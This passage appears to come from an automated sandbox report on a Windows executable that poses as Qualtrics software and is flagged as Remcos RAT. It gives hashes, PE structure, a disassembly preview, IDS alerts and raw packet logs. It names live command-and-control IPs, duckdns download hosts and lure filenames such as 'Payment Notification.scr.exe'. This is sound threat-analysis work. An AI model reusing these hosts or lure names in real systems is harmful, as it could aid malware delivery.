	0rUkHCgvVf.exe	Get hash	malicious	Browse	23.146.242.85
	HxXHmM0T9f.exe	Get hash	malicious	Browse	23.146.242.147
	JQPFEy9Ekx.exe	Get hash	malicious	Browse	23.146.242.85
	http___sowork.duckdns.org_11d_solex.exe	Get hash	malicious	Browse	23.146.242.85
	eXik5mFvet.exe	Get hash	malicious	Browse	23.146.242.94
	CVEXzxk43s.exe	Get hash	malicious	Browse	23.146.242.94
	yOCBr7SNLJ.exe	Get hash	malicious	Browse	23.146.242.94
	13FlI4deWN.exe	Get hash	malicious	Browse	23.146.242.94
	Payment Notification.exe	Get hash	malicious	Browse	23.146.242.147
	Payment Notification.scr.exe	Get hash	malicious	Browse	23.146.242.147
	Payment Notification.scr.exe	Get hash	malicious	Browse	23.146.242.147
	Request For Quotation.jar	Get hash	malicious	Browse	23.146.242.147
	OvBS76pTyX.exe	Get hash	malicious	Browse	23.146.242.94
	U6lqJJBG8S.exe	Get hash	malicious	Browse	23.146.242.94
	pNyAinWdWJ.exe	Get hash	malicious	Browse	23.146.242.94
	YTVrQC7FhG.exe	Get hash	malicious	Browse	23.146.242.94
	I4eRfFgJG7.exe	Get hash	malicious	Browse	23.146.242.94
	sLVCW67F5w.exe	Get hash	malicious	Browse	23.146.242.94
	http___s-rco.duckdns.org_11d_solex.exe	Get hash	malicious	Browse	23.146.242.94

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.210722948101354
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	466XoziOLD.exe
File size:	196608
MD5:	84ade48e59ed36c620d254d325f355d7
SHA1:	6e17eb18c64e00ca9831e940769da9c744a5d5e3
SHA256:	8060a88a8253eafc4c38d56d58d8470b98765308aeafc1e873b95011cbb8cadf
SHA512:	8d4b4ae4c49d9f7f9bf8456d727a78cbd0cc0c2fc969b094bc653ec6d85d2d583337f0acb5b7f5c2fea97f6769f2981b28230d821818c9767cfacf810713ad6b
SSDEEP:	3072:RE8XO9B0GS31gah3MwJvwouDIQVcc+84+Z8j7G9YgVodURItu5:FO9B0GS317h3Mw2ouMWcc+86jq9Rodu
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.......................D.......=.......Rich............PE..L......S.....................0....................@................

File Icon


Icon Hash:	20047c7c70f0e004

Static PE Info

General
Entrypoint:	0x4013f0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x538C1A17 [Mon Jun 2 06:30:47 2014 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	bd85017eeb8dd3332d04b1838f2b93b1

Entrypoint Preview

Instruction
push 004016A4h
call 00007F96F8F76CB3h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], ch
cmp al, 4Dh
into
cmc
pushfd
push esp
dec edi
movsb
mov cl, EEh
call far 0000h : 45CE1C92h
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push ebp
dec esi
push esp
dec ecx
dec ebp
inc ebp
dec esp
dec ecx
dec esi
inc ebp
push ebx
push ebx
add byte ptr [edi], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
dec esp
xor dword ptr [eax], eax
or al, ACh
jc 00007F96F8F76CC3h
sub esp, dword ptr [edx-4Ah]
push ds
inc edx
mov ebx, 4511F505h
das
cmp dl, byte ptr [ebx-13h]
popfd

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2d0b4	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x30000	0xbfa	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x138	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2c568	0x2d000	False	0.621511501736	data	7.42071533983	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x2e000	0x190c	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x30000	0xbfa	0x1000	False	0.253173828125	data	3.1781767801	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
CUSTOM	0x309a0	0x25a	ASCII text, with CRLF line terminators	English	United States
RT_ICON	0x30870	0x130	data
RT_ICON	0x30588	0x2e8	data
RT_ICON	0x30460	0x128	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x30430	0x30	data
RT_VERSION	0x301a0	0x290	MS Windows COFF PA-RISC object file	English	United States

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, __vbaEnd, _adj_fdiv_m64, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, _adj_fdiv_m16i, _adj_fdivr_m16i, __vbaVarTstLt, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, _CIlog, __vbaErrorOverflow, __vbaNew2, __vbaInStr, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaLateMemCall, __vbaVarAdd, __vbaVarDup, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

Version Infos

Description	Data
Translation	0x0409 0x04b0
InternalName	skraalinjers
FileVersion	1.04
CompanyName	Qualtrics
Comments	Qualtrics
ProductName	Qualtrics
ProductVersion	1.04
FileDescription	Qualtrics
OriginalFilename	skraalinjers.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
09/27/21-10:59:46.401028	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	61721	8.8.8.8	192.168.2.4
09/27/21-10:59:47.542847	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	51255	8.8.8.8	192.168.2.4
09/27/21-10:59:47.658245	TCP	2032776	ET TROJAN Remocs 3.x Unencrypted Checkin	49829	2404	192.168.2.4	23.146.242.71
09/27/21-10:59:47.957165	TCP	2032777	ET TROJAN Remocs 3.x Unencrypted Server Response	2404	49829	23.146.242.71	192.168.2.4

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2021 10:59:46.415395975 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.528383017 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.528517008 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.529064894 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.644090891 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.644130945 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.644157887 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.644182920 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.644210100 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.644212961 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.644251108 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.756012917 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.756086111 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.756130934 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.756149054 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.756181955 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.756194115 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.756213903 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.756273031 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.756279945 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.756337881 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.756341934 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.756398916 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.756402969 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.756458044 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.756465912 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.756521940 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.756561995 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.868513107 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.868560076 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.868592024 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.868626118 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.868654013 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.868680954 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.868727922 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.868850946 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.868881941 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.868906021 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.868916035 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.868936062 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.869277954 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.869307995 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.869333029 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.869359016 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.869386911 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.869388103 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.869420052 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.869421005 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.869452000 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.869466066 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.869482994 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.869496107 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.869514942 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.869532108 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.869556904 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.869621992 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.869669914 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.869820118 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.980645895 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.980704069 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.980753899 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.980760098 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.980784893 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.980792999 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.980804920 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.980833054 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.980840921 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.980868101 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.980871916 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.980911970 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.980912924 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.980946064 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.980948925 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.980982065 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.980983973 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.981017113 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.981018066 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.981046915 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.981070995 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.981079102 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.981111050 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.981125116 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.981134892 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.981146097 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.981223106 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.981270075 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.981298923 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.981331110 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.981340885 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.981359959 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.981370926 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.981388092 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.981401920 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.981417894 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.981425047 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.981446981 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.981453896 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.981482983 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.981522083 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.981551886 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.981563091 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.981585979 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.981601000 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.981628895 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.981631994 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.981657028 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.981663942 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.981681108 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.981688023 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.981709003 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.981713057 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.981735945 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.981739044 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.981762886 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.981784105 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.981789112 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.981812954 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.981829882 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.981837988 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.981873035 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.981879950 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:46.981885910 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:46.981905937 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.093112946 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.093138933 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.093172073 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.093198061 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.093223095 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.093249083 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.093274117 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.093317032 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.093343019 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.093373060 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.093394995 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.093420029 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.093424082 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.093489885 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.093503952 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.093530893 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.093556881 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.093586922 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.093616009 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.093641043 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.093667984 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.093718052 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.093765020 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.093782902 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.093826056 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.093913078 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.093919992 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.094032049 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.094069004 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.094110966 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.094137907 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.094161034 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.094180107 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.094197989 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.094204903 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.094228983 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.094258070 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.094284058 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.094309092 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.094352961 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.094352007 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.094376087 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.094403982 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.094415903 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.094429970 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.094455004 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.094460011 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.094471931 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.094479084 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.094502926 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.094515085 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.094521999 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.094567060 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.094681978 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.094707012 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.094731092 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.094741106 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.094758987 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.094788074 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.094832897 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.094835997 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.094868898 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.094933033 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.094964981 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.094968081 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.094981909 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.095005989 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.095005989 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.095032930 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.095037937 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.095050097 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.095069885 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.095084906 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.095102072 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.095134020 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.095160007 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.095180988 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.095268011 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.095464945 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.095496893 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.095516920 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.095526934 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.095537901 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.095554113 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.095557928 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.095582008 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.095601082 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.095607996 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.095632076 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.095634937 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.095658064 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.095662117 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.095679998 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.095700026 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.095719099 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.095724106 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.095740080 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.095767975 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.095930099 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.095938921 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.205404997 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.205476999 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.205509901 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.205539942 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.205571890 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.205591917 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.205602884 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.205635071 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.205770969 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.206054926 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.206093073 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.206125021 CEST	80	49828	23.146.242.85	192.168.2.4
